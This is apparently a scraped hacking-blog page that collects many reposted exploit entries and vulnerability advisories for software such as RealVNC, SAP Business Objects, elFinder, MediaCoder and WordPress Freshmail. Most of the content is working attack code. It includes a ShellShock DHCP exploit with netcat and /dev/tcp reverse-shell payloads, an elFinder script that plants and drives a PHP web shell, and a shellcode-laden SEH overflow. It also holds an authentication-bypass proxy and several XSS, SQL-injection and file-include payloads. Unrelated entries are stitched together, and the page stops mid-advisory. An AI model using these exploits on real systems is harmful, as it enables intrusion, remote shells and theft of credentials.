source: https://www.securityfocus.com/bid/52361/info
SAP Business Objects is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
SAP Business Objects XI R2 is vulnerable; other versions may be affected.
https://www.example.com/businessobjects/enterprise115/infoview/webi/webi_modify.aspx?id='+alert('XSS')+'#
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863583336
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/52361/info
SAP Business Objects is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
SAP Business Objects XI R2 is vulnerable; other versions may be affected.
https://www.example.com/businessobjects/enterprise115/infoview/help/helpredir.aspx?guide='+alert('XSS 1')+'&lang=en&rpcontext='+alert('XSS 2')+'#
# Exploit Title: RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit
# Date: 2012-05-13
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 4.1.0 and 4.1.1
# Tested on: Windows XP
# CVE: CVE-2006-2369
# Requires vncviewer installed
# Basic port of hdmoore/msf2 perl version to python for fun and profit (ease of use)
import select
import thread
import os
import socket
import sys, re
BIND_ADDR = '127.0.0.1'
BIND_PORT = 4444
def pwn4ge(host, port):
socket.setdefaulttimeout(5)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.connect((host, port))
except socket.error, msg:
print '[*] Could not connect to the target VNC service. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1]
sys.exit();
else:
hello = server.recv(12)
print "[*] Hello From Server: " + hello
if hello != "RFB 003.008\n":
print "[*] The remote VNC service is not vulnerable"
sys.exit()
else:
print "[*] The remote VNC service is vulnerable"
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
listener.bind((BIND_ADDR, BIND_PORT))
except socket.error , msg:
print '[*] Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
print "[*] Listener Socket Bind Complete"
listener.listen(10)
print "[*] Launching local vncviewer"
thread.start_new_thread(os.system,('vncviewer ' + BIND_ADDR + '::' + str(BIND_PORT),))
print "[*] Listener waiting for VNC connections on localhost"
client, caddr = listener.accept()
listener.close()
client.send(hello)
chello = client.recv(12)
server.send(chello)
methods = server.recv(2)
print "[*] Auth Methods Recieved. Sending Null Authentication Option to Client"
client.send("\x01\x01")
client.recv(1)
server.send("\x01")
server.recv(4)
client.send("\x00\x00\x00\x00")
print "[*] Proxying data between the connections..."
running = True
while running:
selected = select.select([client, server], [], [])[0]
if client in selected:
buf = client.recv(8192)
if len(buf) == 0:
running = False
server.send(buf)
if server in selected and running:
buf = server.recv(8192)
if len(buf) == 0:
running = False
client.send(buf)
pass
client.close()
server.close()
sys.exit()
def printUsage():
print "[*] Read the source, Luke!"
def main():
try:
SERV_ADDR = sys.argv[1]
SERV_PORT = sys.argv[2]
except:
SERV_ADDR = raw_input("[*] Please input an IP address to pwn: ")
SERV_PORT = 5900
try:
socket.inet_aton(SERV_ADDR)
except socket.error:
printUsage()
else:
pwn4ge(SERV_ADDR, int(SERV_PORT))
if __name__ == "__main__":
main()
#!/usr/bin/python
# Exploit Title: ShellShock dhclient Bash Environment Variable Command Injection PoC
# Date: 2014-09-29
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 4.1
# Tested on: Debian, Ubuntu, Kali
# CVE: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187
from scapy.all import *
conf.checkIPaddr = False
fam,hw = get_if_raw_hwaddr(conf.iface)
victim_assign_ip = "10.0.1.100"
server_ip = "10.0.1.2"
gateway_ip = "10.0.1.2"
subnet_mask = "255.255.255.0"
dns_ip = "8.8.8.8"
spoofed_mac = "00:50:56:c0:00:01"
payload = "() { ignored;}; echo 'moo'"
payload_2 = "() { ignored;}; /bin/nc -e /bin/bash localhost 7777"
payload_3 = "() { ignored;}; /bin/bash -i >& /dev/tcp/10.0.1.1/4444 0>&1 &"
payload_4 = "() { ignored;}; /bin/cat /etc/passwd"
payload_5 = "() { ignored;}; /usr/bin/wget http://google.com"
rce = payload_5
def toMAC(strMac):
cmList = strMac.split(":")
hCMList = []
for iter1 in cmList:
hCMList.append(int(iter1, 16))
hMAC = struct.pack('!B', hCMList[0]) + struct.pack('!B', hCMList[1]) + struct.pack('!B', hCMList[2]) + struct.pack('!B', hCMList[3]) + struct.pack('!B', hCMList[4]) + struct.pack('!B', hCMList[5])
return hMAC
def detect_dhcp(pkt):
# print 'Process ', ls(pkt)
if DHCP in pkt:
# if DHCP Discover then DHCP Offer
if pkt[DHCP].options[0][1]==1:
clientMAC = pkt[Ether].src
print "DHCP Discover packet detected from " + clientMAC
sendp(
Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/
IP(src=server_ip,dst="255.255.255.255")/
UDP(sport=67,dport=68)/
BOOTP(
op=2,
yiaddr=victim_assign_ip,
siaddr=server_ip,
giaddr=gateway_ip,
chaddr=toMAC(clientMAC),
xid=pkt[BOOTP].xid,
sname=server_ip
)/
DHCP(options=[('message-type','offer')])/
DHCP(options=[('subnet_mask',subnet_mask)])/
DHCP(options=[('name_server',dns_ip)])/
DHCP(options=[('lease_time',43200)])/
DHCP(options=[('router',gateway_ip)])/
DHCP(options=[('dump_path',rce)])/
DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1"
)
print "DHCP Offer packet sent"
# if DHCP Request than DHCP ACK
if pkt[DHCP] and pkt[DHCP].options[0][1] == 3:
clientMAC = pkt[Ether].src
print "DHCP Request packet detected from " + clientMAC
sendp(
Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/
IP(src=server_ip,dst="255.255.255.255")/
UDP(sport=67,dport=68)/
BOOTP(
op=2,
yiaddr=victim_assign_ip,
siaddr=server_ip,
giaddr=gateway_ip,
chaddr=toMAC(clientMAC),
xid=pkt[BOOTP].xid
)/
DHCP(options=[('message-type','ack')])/
DHCP(options=[('subnet_mask',subnet_mask)])/
DHCP(options=[('lease_time',43200)])/
DHCP(options=[('router',gateway_ip)])/
DHCP(options=[('name_server',dns_ip)])/
DHCP(options=[('dump_path',rce)])/
DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1"
)
print "DHCP Ack packet sent"
def main():
#sniff DHCP requests
sniff(filter="udp and (port 67 or 68)", prn=detect_dhcp, iface="vmnet1")
if __name__ == '__main__':
sys.exit(main())
source: https://www.securityfocus.com/bid/52361/info
SAP Business Objects is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
SAP Business Objects XI R2 is vulnerable; other versions may be affected.
http://www.example.com/businessobjects/enterprise115/InfoView/listing.aspx
searchText=</script><script>alert(1);</script>
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/>
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
1. Summary
------------------
Freshmail plugin is an email marketing plugin for wordpress, allowing the
administrator to create mail campaigns and keep track of them.
There is a unauthenticated SQL injection vulnerability in the "Subscribe to
our newsletter" formularies showed to the web visitors in the POST
parameter *fm_form_id. *
2. Vulnerability timeline
----------------------------------
- 04/05/2015: Identified in version 1.5.8 and contact the developer company
by twitter.
- 05/05/2015: Send the details by mail to developer.
- 05/05/2015: Response from the developer.
- 06/05/2015: Fixed version in 1.6
3. Vulnerable code
---------------------------
Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50
[...]
Line 28: add_action('wp_ajax_fm_form', 'fm_form_ajax_func');
Line 29: add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func');
[...]
Line 44: $result = $_POST;
[...]
Line 50: $form = $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms
where form_id="'.*$result['fm_form_id']*.'";');
[...]
3. Proof of concept
---------------------------
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <web>
X-Requested-With: XMLHttpRequest
[...]
Cookie: wordpress_f30[...]
form%5Bemail%5D=fake@fake.com&form%5Bimie%5D=asdf&fm_form_id=1" and
"a"="a&action=fm_form&fm_form_referer=%2F
4. Explanation
---------------------
A page visitor can submit an email (fake@fake.com) to subscribe to the
formulary with fm_form_id="1" and the JSON message received will be simil=
ar
to:
{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1*
","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"s=
uccess","message":"*Your
sign up request was successful! Please check your email inbox.*"}
The second time he tries to do the same with the same email the message
returned will be:
{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1*
","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"s=
uccess","message":"*Given
email address is already subscribed, thank you!*"}
If we insert *1**" and substr(user(),1,1)="a *we'll receive either the sa=
me
message indicating that the Given email is already subscribed indicating
that the first character of the username is an "a" or a null message
indicating that the username first character is not an "a".
5. Solution
---------------
Update to version 1.6
source: https://www.securityfocus.com/bid/52358/info
Barracuda CudaTel Communication Server is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.
Barracuda CudaTel Communication Server 2.0.029.1 is vulnerable; other versions may also be affected.
<td class="detailTD">
<div style="float: left;" class="printedName">
"><iframe div="" <="" onload='alert("VL")' src="a">
</td><script type="text/javascript">extensions_register('extOp530748', 'extOp530748-ext144',
{"flag_super":"0","flag_locked":
"0","bbx_extension_rcd":"2012-02-16
11:21:48.105901","bbx_extension_block_begin":"2088","map"{"bbx_conference_id":null,"bbx_provider_gateway_id":null,"sort_name":
"\"><iframe src=a onload=alert(\"vl\")
<","bbx_valet_parking_id":null,"bbx_extension_entity_map_id":"82","bbx_extension_entity_
map_fallback_exten":null,"bbx_
extension_entity_map_metadata":null,"bbx_user_id":null,"bbx_router_id":"20","bbx_group_id":null,"bbx_callflow_id":null,"_force_
row_refresh":"0","show_name":"\"><[EXECUTION OF PERSISTENT SCRIPT CODE]
<","bbx_queue_id":null,"bbx_tdm_card_port_id":null,"flag_standalone":"1","bbx_auto_attendant_id":null,"bbx_extension_id_
forward":null},"bbx_extension_name":null,"bbx_domain_id":"6","bbx_extension_block_end":"2088","type_id":
{"id":"20","type":"router","col":"bbx_router_id"},"map_id":"82","flag_external":"0","flag_voicemail":"0","bbx_extension_value"
:"2088","ldap":0,"bbx_extension_rpd":"2012-02-16 11:21:49.06783","user_synced":null,"printed_name":"\"><[EXECUTION OF
PERSISTENT SCRIPT CODE]
<","bbx_extension_id":"144","group_synced":null,"type":"router","flag_auto_provision":"0"});</script>
source: https://www.securityfocus.com/bid/52351/info
Macro Toolworks is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Local attackers can exploit this issue to run arbitrary code with elevated privileges. Failed exploit attempts can result in a denial-of-service condition.
Macro Toolworks 7.5.0 is vulnerable; other versions may also be affected.
#!/usr/bin/python
# Exploit Title: Pitrinec Software Macro Toolworks Free/Standard/Pro v7.5.0 Local Buffer Overflow
# Version: 7.5.0
# Date: 2012-03-04
# Author: Julien Ahrens
# Homepage: http://www.inshell.net
# Software Link: http://www.macrotoolworks.com
# Tested on: Windows XP SP3 Professional German / Windows 7 SP1 Home Premium German
# Notes: Overflow occurs in _prog.exe, vulnerable are all Pitrinec applications on the same way.
# Howto: Copy options.ini to App-Dir --> Launch
# 646D36: The instruction at 0x646D36 referenced memory at 0x42424242. The memory could not be read -> 42424242
(exc.code c0000005, tid 3128)
# Registers:
# EAX 0120EA00 Stack[000004C8]:0120EA00
# EBX FFFFFFFF
# ECX 42424242
# EDX 00000002
# ESI 007F6348 _prog.exe:007F6348
# EDI 007F6348 _prog.exe:007F6348
# EBP 0120EA0C Stack[000004C8]:0120EA0C
# ESP 0120E9E8 Stack[000004C8]:0120E9E8
# EIP 00646D36 _prog.exe:00646D36
# EFL 00200206
# Stack:
# 0120E9E0 0012DF3C
# 0120E9E4 00000000
# 0120E9E8 0205A5A0 debug045:0205A5A0
# 0120E9EC 1B879EF8
# 0120E9F0 007F6348 _prog.exe:007F6348
# 0120E9F4 007F6348 _prog.exe:007F6348
# Crash:
# _prog.exe:00646D36 ; ---------------------------------------------------------------------------
# _prog.exe:00646D36 mov eax, [ecx]
# _prog.exe:00646D38 call dword ptr [eax+0Ch]
# _prog.exe:00646D3B call near ptr unk_6750D0
# _prog.exe:00646D40 retn 4
# _prog.exe:00646D40 ; ---------------------------------------------------------------------------
# Dump:
# 007F6380 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
# 007F6390 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
# 007F63A0 42 42 42 42 43 43 43 43 43 43 43 43 43 43 43 43 BBBBCCCCCCCCCCCC
# 007F63B0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
# 007F63C0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
file="options.ini"
junk1="\x41" * 744
boom="\x42\x42\x42\x42"
junk2="\x43" * 100
poc="[last]\n"
poc=poc + "file=" + junk1 + boom + junk2
try:
print "[*] Creating exploit file...\n"
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "[*] File successfully created!"
except:
print "[!] Error while creating file!"
source: https://www.securityfocus.com/bid/52356/info
Ilient SysAid is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker could leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
Ilient SysAid 8.5.05 is vulnerable; other versions may also be affected.
HTML injection:
<tablewidth="100%"cellspacing="5"cellpadding="5"border="0"class="Maxed">
<tbody><trvalign="top"><tdwidth="50%"style="padding:10px;"id="Container_1"><tableclass="MaxedContainerContainer_1">
<tbody><tr>
<tdclass="Container_Header">
<table>
<tbody><tr>
<tdclass="Container_Header_First">
<tdclass="Container_Header_Center">
Administratorsonline
</td><tdclass="Container_Header_Last">
</td>
</tr>
</tbody></table></td>
</tr>
<tr>
<tdclass="Container_Body">
<divclass="BorderFix_FFForm_Ctrl_Label">
<br/>
1Users<br/>
JulienAhrens<EXCUTES PERSISTENT SCRIPt CODE HERE!></div></td></tr></tbody></table></td></tr></tbody>
</table></div></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></body></html>
Cross-site scripting:
http://www.example.com:8080/sysaid/CustomizeListView.jsp?listName=Assets&listViewName=<script>alert(document.cookie)</script>
or base64 encoded:
http://www.example.com:8080/sysaid/CustomizeListView.jsp?listName=Service%20Requests&srType=1&listViewName= ()
BASE64@PHNjcmlwdD5hb
GVydChlc2NhcGUoZG9jdW1lbnQuY29va2llKSk8L3NjcmlwdD4=
Non-persistent(listViewName):
<tdcolspan="6"class="Frame_Body_Center">
<tablewidth="100%"border="0"class="Maxed">
<tbody><trvalign="top">
<tdstyle="padding:10px;"id="Conainer_1">
<tablewidth=""cellspacing="0"cellpadding="0"border="0">
<tbody><tr>
<td>
<tablewidth="100%"cellspacing="0"cellpadding="0"border="0"class="MaxedContainerContainer_1">
<tbody><tr>
<tdclass="Container_Header">
<table>
<tbody><tr>
<tdclass="Container_Header_First"/>
<tdclass="Container_Header_Center">
<palign="center"style="font-size:16px;">Customizelist-Assets-<EXCUTES PERSISTENT SCRIPt CODE HERE>
</p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr>
</tbody></table></td></tr></tbody></table></form></body></html>
source: https://www.securityfocus.com/bid/52350/info
ToendaCMS is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks.
The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
ToendaCMS 1.6.2 is vulnerable; other versions may also be affected.
http://www.example.com/setup/index.php?site=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/s
#[+] Author: TUNISIAN CYBER
#[+] Title: elFinder 2 Remote Command Execution (Via File Creation) Vulnerability
#[+] Date: 06-05-2015
#[+] Vendor: https://github.com/Studio-42/elFinder
#[+] Type: WebAPP
#[+] Tested on: KaliLinux (Debian)
#[+] Twitter: @TCYB3R
#[+] Time Line:
# 03-05-2015:Vulnerability Discovered
# 03-05-2015:Contacted Vendor
# 04-05-2015:No response
# 05-05-2015:No response
# 06-05-2015:No response
# 06-05-2015:Vulnerability published
import cookielib, urllib
import urllib2
import sys
print"\x20\x20+-------------------------------------------------+"
print"\x20\x20| elFinder Remote Command Execution Vulnerability |"
print"\x20\x20| TUNISIAN CYBER |"
print"\x20\x20+-------------------------------------------------+"
host = raw_input('\x20\x20Vulnerable Site:')
evilfile = raw_input('\x20\x20EvilFileName:')
path=raw_input('\x20\x20elFinder s Path:')
tcyber = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(tcyber))
create = opener.open('http://'+host+'/'+path+'/php/connector.php?cmd=mkfile&name='+evilfile+'&target=l1_Lw')
#print create.read()
payload = urllib.urlencode({
'cmd' : 'put',
'target' : 'l1_'+evilfile.encode('base64','strict'),
'content' : '<?php passthru($_GET[\'cmd\']); ?>'
})
write = opener.open('http://'+host+'/'+path+'/php/connector.php', payload)
#print write.read()
print '\n'
while True:
try:
cmd = raw_input('[She3LL]:~# ')
execute = opener.open('http://'+host+'/'+path+'/admin/js/plugins/elfinder/files/'+evilfile+'?cmd='+urllib.quote(cmd))
reverse = execute.read()
print reverse;
if cmd.strip() == 'exit':
break
except Exception:
break
sys.exit()
source: https://www.securityfocus.com/bid/52347/info
LeKommerce is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/path/secc.php?id={sqli}
Document Title:
===============
PDF Converter & Editor 2.1 iOS - File Include Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1480
Release Date:
=============
2015-05-06
Vulnerability Laboratory ID (VL-ID):
====================================
1480
Common Vulnerability Scoring System:
====================================
6.9
Product & Service Introduction:
===============================
Text Editor & PDF Creator is your all-in-one document management solution for iPhone, iPod touch and iPad.
It can catch documents from PC or Mac via USB cable or WIFI, email attachments, Dropbox and box and save
it on your iPhone, iPod Touch or iPad locally.
(Copy of the Vendor Homepage: https://itunes.apple.com/it/app/text-editor-pdf-creator/id639156936 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered file include web vulnerability in the official AppzCreative - PDF Converter & Text Editor v2.1 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-05-06: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
AppzCreative Ltd
Product: PDF Converter & Text Editor - iOS Web Application (Wifi) 2.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official AppzCreative - PDF Converter & Text Editor v2.1 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands
to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `submit upload` module. Remote attackers are able to inject own files with malicious
`filename` values in the `file upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in
the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface`
in connection with the vulnerable file upload POST method request.
Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious
attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Submit (Upload)
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:52437/)
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by remote attackers (network) without privileged application user account and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Install the software to your iOS device
2. Start the mobile ios software and activate the web-server
3. Open the wifi interface for file transfers
4. Start a session tamper and upload a random fil
5. Change in the live tamper by interception of the vulnerable value the filename input (lfi payload)
6. Save the input by processing to continue the request
7. The code executes in the main file dir index list of the local web-server (localhost:52437)
8. Open the link with the private folder and attach the file for successful exploitation with the path value
9. Successful reproduce of the vulnerability!
PoC: Upload File (http://localhost:52437/Box/)
<div id="module_main"><bq>Files</bq><p><a href="..">..</a><br>
<a href="<iframe>2.png"><../[LOCAL FILE INCLUDE VULNERABILITY IN FILENAME!]>2.png</a> ( 0.5 Kb, 2015-04-30 10:58:46 +0000)<br />
</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file<input type="file" name="file" id="file" /></label><label><input type="submit" name="button" id="button" value="Submit" /></label></form></div></center></body></html></iframe></a></p></div>
--- PoC Session Logs [POST] (LFI - Filename) ---
Status: 200[OK]
POST http://localhost:52437/Box/
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3262] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:52437]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:52437/Box/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------321711425710317
Content-Disposition: form-data; name="file"; filename="../[LOCAL FILE INCLUDE VULNERABILITY IN FILENAME!]>2.png"
Content-Type: image/png
Reference(s):
http://localhost:52437/
http://localhost:52437/Box/
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and
disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks.
Encode the output in the file dir index list with the vulnerable name value to prevent application-side script code injection attacks.
Security Risk:
==============
The security rsik of the local file include web vulnerability in the filename value of the wifi service is estimated as high. (CVSS 6.9)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
#!/usr/bin/python
# Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit (.m3u)
# Date: 05/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at ]yahoo [dot] com
# Version: 0.8.34.5716
# Tested on: Win XP3
# Vendor: http://www.mediacoderhq.com/
# Software link: http://www.mediacoderhq.com/getfile.htm?site=mediacoder.info&file=MediaCoder-0.8.34.5716.exe
# Greetz: b33f,corelan,offsec,vulnhub,HUST510
# Notes: Due to insifficient space after taking control of the EIP, you have to jump backwards and also
# avoid a few bad bytes after the "A"s.
#!/usr/bin/python
buffersize = 853
buffer = ("http://" + "\x41" * 256)
#Space for shellcode to decode
buffer += "\x90" * 24
# msfpayload windows/exec CMD=calc R|msfencode -b "\x00\x0a\x0d\x20" -t c -e x86/shikata_ga_nai
#[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)
#unsigned char buf[] =
buffer +=("\xdd\xc1\xbd\xc4\x15\xfd\x3a\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
"\x32\x31\x6f\x17\x03\x6f\x17\x83\x2b\xe9\x1f\xcf\x4f\xfa\x69"
"\x30\xaf\xfb\x09\xb8\x4a\xca\x1b\xde\x1f\x7f\xac\x94\x4d\x8c"
"\x47\xf8\x65\x07\x25\xd5\x8a\xa0\x80\x03\xa5\x31\x25\x8c\x69"
"\xf1\x27\x70\x73\x26\x88\x49\xbc\x3b\xc9\x8e\xa0\xb4\x9b\x47"
"\xaf\x67\x0c\xe3\xed\xbb\x2d\x23\x7a\x83\x55\x46\xbc\x70\xec"
"\x49\xec\x29\x7b\x01\x14\x41\x23\xb2\x25\x86\x37\x8e\x6c\xa3"
"\x8c\x64\x6f\x65\xdd\x85\x5e\x49\xb2\xbb\x6f\x44\xca\xfc\x57"
"\xb7\xb9\xf6\xa4\x4a\xba\xcc\xd7\x90\x4f\xd1\x7f\x52\xf7\x31"
"\x7e\xb7\x6e\xb1\x8c\x7c\xe4\x9d\x90\x83\x29\x96\xac\x08\xcc"
"\x79\x25\x4a\xeb\x5d\x6e\x08\x92\xc4\xca\xff\xab\x17\xb2\xa0"
"\x09\x53\x50\xb4\x28\x3e\x3e\x4b\xb8\x44\x07\x4b\xc2\x46\x27"
"\x24\xf3\xcd\xa8\x33\x0c\x04\x8d\xcc\x46\x05\xa7\x44\x0f\xdf"
"\xfa\x08\xb0\x35\x38\x35\x33\xbc\xc0\xc2\x2b\xb5\xc5\x8f\xeb"
"\x25\xb7\x80\x99\x49\x64\xa0\x8b\x29\xeb\x32\x57\xae")
buffer += "\x42" * 350
nseh = "\xEB\x06\x90\x90"
# 0x660104ee : pop edi # pop ebp # ret | [libiconv-2.dll]
seh="\xee\x04\x01\x66"
#Jump back 603 bytes due to insufficient space for shellcode
jmpbck = "\xe9\xA5\xfd\xff\xff"
junk = ("D" * 55)
f= open("exploit.m3u",'w')
f.write(buffer + nseh + seh + jmpbck + junk)
f.close()
Document Title:
===============
vPhoto-Album v4.2 iOS - File Include Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1477
Release Date:
=============
2015-05-05
Vulnerability Laboratory ID (VL-ID):
====================================
1477
Common Vulnerability Scoring System:
====================================
6.2
Product & Service Introduction:
===============================
vPhoto Pro is your side of the most powerful local album management software that allows you to easily manage your massive photos,
while giving you an unprecedented user experience. No in-app purchase, no functional limitations.
(Copy of the Homepage: https://itunes.apple.com/us/app/veryphoto-album-password-wifi/id720810114 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a local file include web vulnerability in the official vPhoto-Album v4.2 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-05-05: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Cheng Chen
Product: vPhoto-Album - iOS Web Application (Wifi) 4.1
Exploitation Technique:
=======================
Remote
